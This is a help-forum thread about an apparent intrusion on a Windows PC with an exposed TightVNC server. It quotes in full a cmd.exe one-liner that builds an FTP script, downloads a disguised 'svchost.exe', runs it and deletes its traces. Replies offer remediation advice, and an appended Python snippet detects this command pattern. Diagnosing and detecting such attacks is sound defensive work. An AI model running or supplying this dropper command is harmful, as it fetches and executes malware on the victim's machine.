Google Chrome

Robert Munch

Can someone explain this? I found this on my home desktop computer on Google Chrome when I stepped away from my computer for a few hours. Was my computer hacked somehow, and how could this have occurred?

systemroot%\system32\cmd.exe cmd /c echo open 127.0.0.1 21 >> ik &echo user owned suckdicky >> ik &echo binari >> ik &echo get svchost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svchost.exe &exit

No cmd box prompt occurred; this was in my Google Chrome Google search bar as a "result". I live by myself, so nobody did this as a prank while I was away.
 

RebateMonger

Here's a year-old thread nearly identical to yours:

http://ubuntuforums.org/archive/index.php/t-1244618.html

If it was my computer, I'd rebuild it from scratch or restore it from image backups. And I'd be sure that any remote access software was protected with a very long password, that there's a router between the Internet and the PC, and be very careful about any software that gets run or installed.

"IK" is likely a Keylogger program. It stands for "invisible keylogger". It looks like it's being used here to remotely type ftp commands.

> No cmd box prompt occurred this was in my google chrome google search bar as a "result".

A quick check and it seems that some commands can be run from the Chrome address bar. I don't know how extensive this is or if other browsers can do this.
 

Robert Munch

From what I understand it seems the invader tried to delete my svchost.exe as it was referencing 127.0.0.1 21. I was also DMZ'd during this time with TightVNC running. When I relaunched VNC I noticed the admin password was removed including the login password to access the machine. Some sort of brute force attack maybe.

I'm not sure if in fact this file is removed, and I'm running on Win7 if that makes a difference. I tried to check the vncviewer.log and noticed it was at 0kb with it enabled. I've had it running for the past few days. I'm not sure how to locate an IP address from this attack.

Found another interesting article http://www.hellboundhackers.org/forum/a_bothuman_tryed_connecting_to_my_vncserver-14-11285_0.html regarding these types of attacks.
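
A defender-side check for the pattern in the command line quoted in the first post, as an added example that is not part of the original thread: it splits the line on `&`, collects what is echoed into a file, and flags the case where that file is passed to `ftp -s:` and a file it fetched is then run. The function name `analyze` and the benign comparison line are constructed for illustration.

```python
import re

# Command line exactly as quoted in the first post of this thread.
SAMPLE = (r'systemroot%\system32\cmd.exe cmd /c echo open 127.0.0.1 21 >> ik '
          r'&echo user owned suckdicky >> ik &echo binari >> ik '
          r'&echo get svchost.exe >> ik &echo bye >> ik '
          r'&ftp -n -v -s:ik &del ik &svchost.exe &exit')
# Constructed benign line for comparison (not from the thread).
BENIGN = r'cmd /c echo build finished >> build.log & type build.log'

CMD_PREFIX = re.compile(r'^.*?\bcmd(?:\.exe)?\s+/c\s+', re.I)
ECHO_TO_FILE = re.compile(r'^echo\s+(.*?)\s*>>?\s*(\S+)$', re.I)
FTP_SCRIPT = re.compile(r'^ftp(?:\.exe)?\b.*?-s:(\S+)', re.I)

def analyze(cmdline):
    """Report whether a cmd.exe line builds an FTP script with echo, runs it
    through ftp -s:, and then executes a file that script downloaded."""
    scripts = {}  # file name -> lines echoed into it
    report = {"script": None, "ftp_lines": [], "fetched": [],
              "deleted": False, "executed": [], "suspicious": False}
    body = CMD_PREFIX.sub('', cmdline, count=1)
    for part in (p.strip() for p in body.split('&')):
        m = ECHO_TO_FILE.match(part)
        if m:
            scripts.setdefault(m.group(2).lower(), []).append(m.group(1))
            continue
        m = FTP_SCRIPT.match(part)
        if m and m.group(1).lower() in scripts:
            report["script"] = m.group(1).lower()
            report["ftp_lines"] = scripts[report["script"]]
            # "get remote [local]": the last token is the file written locally.
            report["fetched"] = [l.split()[-1].lower() for l in report["ftp_lines"]
                                 if l.lower().startswith("get ") and len(l.split()) > 1]
            continue
        words = [w.lower() for w in part.split()]
        if not words:
            continue
        if words[0] in ("del", "erase") and report["script"] in words[1:]:
            report["deleted"] = True   # the script file is removed after use
        elif words[0] in report["fetched"]:
            report["executed"].append(words[0])
    # Flag only the full chain: echoed script -> ftp -s: -> run the download.
    report["suspicious"] = bool(report["script"] and report["executed"])
    return report

if __name__ == "__main__":
    for name, line in (("thread sample", SAMPLE), ("benign", BENIGN)):
        print(name, analyze(line))
```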
 